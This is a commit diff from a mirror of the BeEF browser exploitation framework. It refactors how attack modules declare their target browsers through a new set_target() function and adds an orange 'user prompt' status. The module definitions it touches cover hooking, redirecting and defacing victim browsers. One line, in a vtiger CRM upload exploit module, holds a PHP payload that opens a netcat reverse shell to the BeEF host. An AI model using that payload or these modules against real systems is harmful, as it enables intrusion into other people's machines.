Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Updated for issue 185. This change added another traffic light (orange == user prompt) to the module targets. Also targets are now set using the set_target() function.

Browse Source 
No OS target functionality is currently in place. 



git-svn-id: https://beef.googlecode.com/svn/trunk@619 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
This commit is contained in:
wade@bindshell.net
2010-12-19 04:35:13 +00:00
parent 4d5f51fbe5
commit aeacf83aa8
21 changed files with 183 additions and 103 deletions
Download Patch File Download Diff File Expand all files Collapse all files

8
lib/constants.rb
View File

@@ -7,11 +7,13 @@ module Constants
module CommandModule
MODULE_TARGET_VERIFIED_NOT_WORKING = 0
MODULE_TARGET_VERIFIED_WORKING = 1
MODULE_TARGET_VERIFIED_UNKNOWN = 2
MODULE_TARGET_VERIFIED_NOT_WORKING = 0
MODULE_TARGET_VERIFIED_WORKING = 1
MODULE_TARGET_VERIFIED_USER_NOTIFY = 2
MODULE_TARGET_VERIFIED_UNKNOWN = 3
MODULE_TARGET_VERIFIED_NOT_WORKING_IMG = 'red.png'
MODULE_TARGET_VERIFIED_USER_NOTIFY_IMG = 'orange.png'
MODULE_TARGET_VERIFIED_WORKING_IMG = 'green.png'
MODULE_TARGET_VERIFIED_UNKNOWN_IMG = 'grey.png'

56
lib/modules/command.rb
View File

@@ -39,8 +39,15 @@ module BeEF
BD = BeEF::Models::BrowserDetails
ALL = BeEF::Constants::Browsers::ALL
IE = BeEF::Constants::Browsers::IE
S = BeEF::Constants::Browsers::S
FF = BeEF::Constants::Browsers::FF
C = BeEF::Constants::Browsers::C
VERIFIED_WORKING = BeEF::Constants::CommandModule::MODULE_TARGET_VERIFIED_WORKING
VERIFIED_NOT_WORKING = BeEF::Constants::CommandModule::MODULE_TARGET_VERIFIED_NOT_WORKING
VERIFIED_USER_NOTIFY = BeEF::Constants::CommandModule::MODULE_TARGET_VERIFIED_USER_NOTIFY
VERIFIED_UNKNOWN = BeEF::Constants::CommandModule::MODULE_TARGET_VERIFIED_UNKNOWN
# Super class controller
@@ -114,37 +121,62 @@ module BeEF
end
# set the target details
# this function is used when determining the code of the node icon
def set_target(definition)
@target = [] if not @target
@target.push(definition)
end
# verify whether this command module has been checked against the target browser
# this function is used when determining the code of the node icon
def verify_target
return VERIFIED_UNKNOWN if not @target # no target specified in the module
@target.each {|definition|
return definition['verified_status'] if test_target(definition)
}
return VERIFIED_UNKNOWN
end
# test if the target definition matches the hooked browser
# this function is used when determining the code of the node icon
def test_target(target_definition)
# if the target is not set in the module return unknown
return VERIFIED_UNKNOWN if @target.nil?
return VERIFIED_UNKNOWN if @target['browser_name'].nil?
return false if target_definition.nil?
# return false if not target_definition[0]['browser_name']
return false if target_definition['browser_name'].nil?
# retrieve the target browser name
browser_name = get_browser_detail('BrowserName')
return VERIFIED_UNKNOWN if browser_name.eql? 'UNKNOWN' or browser_name.nil?
return false if browser_name.eql? 'UNKNOWN' or browser_name.nil?
# check if the browser is targeted
all_browsers_targeted = @target['browser_name'].eql? BeEF::Constants::Browsers::ALL
target_browser_matches = browser_name.eql? @target['browser_name']
return VERIFIED_NOT_WORKING if not (target_browser_matches || all_browsers_targeted)
all_browsers_targeted = target_definition['browser_name'].eql? BeEF::Constants::Browsers::ALL
target_browser_matches = browser_name.eql? target_definition['browser_name']
return false if not (target_browser_matches || all_browsers_targeted)
# assume that the browser_maxver and browser_minver were excluded
return VERIFIED_WORKING if @target['browser_maxver'].nil? && @target['browser_minver'].nil?
return true if target_definition['browser_maxver'].nil? && target_definition['browser_minver'].nil?
# check if the browser version is targeted
browser_version = get_browser_detail('BrowserVersion')
browser_version = 'UNKNOWN' if browser_version.nil?
return VERIFIED_UNKNOWN if browser_version.eql? 'UNKNOWN'
return false if browser_version.eql? 'UNKNOWN'
# check the browser version number is within range
return VERIFIED_NOT_WORKING if browser_version.to_f > @target['browser_maxver'].to_f
return VERIFIED_NOT_WORKING if browser_version.to_f < @target['browser_minver'].to_f
return false if browser_version.to_f > target_definition['browser_maxver'].to_f
return false if browser_version.to_f < target_definition['browser_minver'].to_f
# all the checks passed and this module targets the user agent
VERIFIED_WORKING
true
end
# Store the browser detail in the database.
def set_browser_detail(key, value)
raise WEBrick::HTTPStatus::BadRequest, "@session_id is invalid" if not BeEF::Filter.is_valid_hook_session_id?(@session_id)

2
lib/ui/modules/modules.rb
View File

@@ -198,6 +198,8 @@ class Modules < BeEF::HttpController
case command_module.verify_target() # select the correct icon for the command module
when BeEF::Constants::CommandModule::MODULE_TARGET_VERIFIED_NOT_WORKING
command_module_icon_path += BeEF::Constants::CommandModule::MODULE_TARGET_VERIFIED_NOT_WORKING_IMG
when BeEF::Constants::CommandModule::MODULE_TARGET_VERIFIED_USER_NOTIFY
command_module_icon_path += BeEF::Constants::CommandModule::MODULE_TARGET_VERIFIED_USER_NOTIFY_IMG
when BeEF::Constants::CommandModule::MODULE_TARGET_VERIFIED_WORKING
command_module_icon_path += BeEF::Constants::CommandModule::MODULE_TARGET_VERIFIED_WORKING_IMG
when BeEF::Constants::CommandModule::MODULE_TARGET_VERIFIED_UNKNOWN

11
modules/commands/browser/detect_details/detect_details.rb
View File

@@ -13,11 +13,14 @@ class Detect_details < BeEF::Command
},
'Category' => 'Browser',
'Author' => ['wade','vo','passbe'],
'File' => __FILE__,
'Target' => {
'browser_name' => BeEF::Constants::Browsers::ALL
}
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use 'beef.dom'
use_template!
end

10
modules/commands/browser/detect_visited_urls/detect_visited_urls.rb
View File

@@ -13,11 +13,13 @@ class Detect_visited_urls < BeEF::Command
'Data' => [
['ui_label'=>'URL(s)', 'name'=>'urls', 'type'=>'textarea', 'value'=>'http://www.bindshell.net/', 'width'=>'200px']
],
'File' => __FILE__,
'Target' => {
'browser_name' => BeEF::Constants::Browsers::ALL
}
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use_template!
end

12
modules/commands/browser/site_redirect/site_redirect.rb
View File

@@ -13,11 +13,13 @@ class Site_redirect < BeEF::Command
'Data' => [
['ui_label'=>'Redirect URL', 'name'=>'redirect_url', 'value'=>'http://www.bindshell.net/', 'width'=>'200px']
],
'File' => __FILE__,
'Target' => {
'browser_name' => BeEF::Constants::Browsers::ALL
}
})
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use_template!
end

32
modules/commands/browser/site_redirect_iframe/site_redirect_iframe.rb
View File

@@ -10,20 +10,24 @@ class Site_redirect_iframe < BeEF::Command
#
def initialize
super({
'Name' => 'Site Redirect (iFrame)',
'Description' => 'This module will redirect the hooked browser to the address specified in the \'Redirect URL\' input. It creates a 100% x 100% overlaying iframe to keep the victim hooked and changes the page title to the provided value which should be set to the title of the redirect URL.',
'Category' => 'Browser',
'Author' => ['ethicalhack3r, Yori Kvitchko'],
'Data' => [
['name' => 'iframe_title', 'ui_label' => 'New Page Title', 'value' => 'BindShell.Net: Home', 'width'=>'200px'],
['name' => 'iframe_src', 'ui_label' => 'Redirect URL', 'value' => 'http://www.bindshell.net/', 'width'=>'200px'],
['name' => 'iframe_timeout', 'ui_label' => 'Timeout', 'value' => '3500', 'width'=>'150px']
],
'File' => __FILE__,
'Target' => { 'browser_name' => BeEF::Constants::Browsers::ALL }
})
use_template!
'Name' => 'Site Redirect (iFrame)',
'Description' => 'This module will redirect the hooked browser to the address specified in the \'Redirect URL\' input. It creates a 100% x 100% overlaying iframe to keep the victim hooked and changes the page title to the provided value which should be set to the title of the redirect URL.',
'Category' => 'Browser',
'Author' => ['ethicalhack3r, Yori Kvitchko'],
'Data' => [
['name' => 'iframe_title', 'ui_label' => 'New Page Title', 'value' => 'BindShell.Net: Home', 'width'=>'200px'],
['name' => 'iframe_src', 'ui_label' => 'Redirect URL', 'value' => 'http://www.bindshell.net/', 'width'=>'200px'],
['name' => 'iframe_timeout', 'ui_label' => 'Timeout', 'value' => '3500', 'width'=>'150px']
],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use_template!
end
# This method is being called when a hooked browser sends some

10
modules/commands/host/iphone_skype/iphone_skype.rb
View File

@@ -24,10 +24,12 @@ class Iphone_skype < BeEF::Command
'width' => '200px'
],
],
'File' => __FILE__,
'Target' => {
'browser_name' => BeEF::Constants::Browsers::S
}
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => S
})
use 'beef.dom'

10
modules/commands/host/iphone_tel/iphone_tel.rb
View File

@@ -25,10 +25,12 @@ class Iphone_tel < BeEF::Command
'width' => '200px'
],
],
'File' => __FILE__,
'Target' => {
'browser_name' => BeEF::Constants::Browsers::S
}
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => S
})
use 'beef.dom'

10
modules/commands/host/physical_location/physical_location.rb
View File

@@ -13,10 +13,12 @@ class Physical_location < BeEF::Command
},
'Category' => 'Host',
'Author' => ['antisnatchor'],
'File' => __FILE__,
'Target' => {
'browser_name' => BeEF::Constants::Browsers::ALL
}
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_USER_NOTIFY,
'browser_name' => ALL
})
use 'beef.geolocation'

10
modules/commands/misc/alert_dialog/alert_dialog.rb
View File

@@ -15,10 +15,12 @@ class Alert_dialog < BeEF::Command
'Category' => 'Misc',
'Author' => 'bm',
'Data' => [['name' => 'text', 'ui_label'=>'Alert text', 'type' => 'textarea', 'value' =>'BeEF', 'width' => '400px', 'height' => '100px']],
'File' => __FILE__,
'Target' => {
'browser_name' => BeEF::Constants::Browsers::ALL
}
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
# This tells the framework to use the file 'alert.js' as the command module instructions.

10
modules/commands/misc/deface_web_page/deface_web_page.rb
View File

@@ -24,10 +24,12 @@ class Deface_web_page < BeEF::Command
'height' => '100px'
],
],
'File' => __FILE__,
'Target' => {
'browser_name' => BeEF::Constants::Browsers::ALL
}
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use 'beef.dom'

10
modules/commands/misc/prompt_dialog/prompt_dialog.rb
View File

@@ -11,10 +11,12 @@ class Prompt_dialog < BeEF::Command
'Category' => 'Misc',
'Author' => 'bm',
'Data' => [['name' =>'question', 'ui_label'=>'Prompt text']],
'File' => __FILE__,
'Target' => {
'browser_name' => BeEF::Constants::Browsers::ALL
}
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use_template!

10
modules/commands/misc/raw_javascript/raw_javascript.rb
View File

@@ -21,10 +21,12 @@ class Raw_javascript < BeEF::Command
'value' => "alert(\'BeEF Raw Javascript\');\nreturn \'It worked!\';",
'type' => 'textarea', 'width' => '400px', 'height' => '100px'],
],
'File' => __FILE__ ,
'Target' => {
'browser_name' => BeEF::Constants::Browsers::ALL
}
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use_template!

24
modules/commands/network/detect_local_settings/detect_local_settings.rb
View File

@@ -10,17 +10,25 @@ class Detect_local_settings < BeEF::Command
'Description' => 'Grab the local network settings (i.e internal ip address)',
'Category' => 'Network',
'Author' => ['pdp', 'wade', 'bm'],
'File' => __FILE__,
'Target' => {
'browser_name' => [
BeEF::Constants::Browsers::FF,
BeEF::Constants::Browsers::C
]
}
'File' => __FILE__
})
use 'beef.net.local'
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => FF
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => C
})
set_target({
'verified_status' => VERIFIED_NOT_WORKING,
'browser_name' => IE
})
use 'beef.net.local'
use_template!
end

10
modules/commands/network/vtiger_crm_upload_exploit/vtiger_crm_upload_exploit.rb
View File

@@ -29,10 +29,12 @@ class Vtiger_crm_upload_exploit < BeEF::Command
['name'=>'vtiger_php','ui_label'=>'Injected PHP','value'=>'passthru("/bin/nc -e /bin/sh '+beef_host+' 8888");','type'=>'textarea','width'=>'400px','height'=>'100px'],
['name'=>'upload_timeout','ui_label'=>'Upload Timeout','value'=>'5000']
],
'File' => __FILE__,
'Target' => {
'browser_name' => BeEF::Constants::Browsers::ALL
}
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use 'beef.net.local'

20
modules/commands/persistence/popunder_window/popunder_window.rb
View File

@@ -10,15 +10,19 @@ class Popunder_window < BeEF::Command
#
def initialize
super({
'Name' => 'Pop Under Window',
'Description' => 'Creates a new discrete pop under window with the beef hook included.<br><br>This module will add another browser node to the tree. It will be a duplicate. This will be addressed in a future release',
'Category' => 'Persistence',
'Author' => 'ethicalhack3r',
'File' => __FILE__,
'Target' => { 'browser_name' => BeEF::Constants::Browsers::ALL }
})
'Name' => 'Pop Under Window',
'Description' => 'Creates a new discrete pop under window with the beef hook included.<br><br>This module will add another browser node to the tree. It will be a duplicate. This will be addressed in a future release',
'Category' => 'Persistence',
'Author' => 'ethicalhack3r',
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use_template!
use_template!
end

10
modules/commands/recon/collect_links/collect_links.rb
View File

@@ -13,10 +13,12 @@ class Collect_links < BeEF::Command
},
'Category' => 'Recon',
'Author' => ['vo'],
'File' => __FILE__,
'Target' => {
'browser_name' => BeEF::Constants::Browsers::ALL
}
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use 'beef.dom'

10
modules/commands/recon/detect_cookies_support/detect_cookies.rb
View File

@@ -14,10 +14,12 @@ class Detect_cookies < BeEF::Command
'Category' => 'Recon',
'Data' => [['name' => 'cookie', 'ui_label' => 'Cookie name', 'value' =>'cookie']],
'Author' => ['vo'],
'File' => __FILE__,
'Target' => {
'browser_name' => BeEF::Constants::Browsers::ALL
}
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use 'beef.browser.cookie'

11
modules/commands/recon/detect_tor/detect_tor.rb
View File

@@ -14,14 +14,15 @@ class Detect_tor < BeEF::Command
[
['name'=>'timeout', 'ui_label' =>'Detection timeout','value'=>'10000']
],
'File' => __FILE__,
'Target' => {
'browser_name' => BeEF::Constants::Browsers::ALL
}
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use 'beef.net.local'
use_template!
end

BIN
public/images/icons/orange.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 3.5 KiB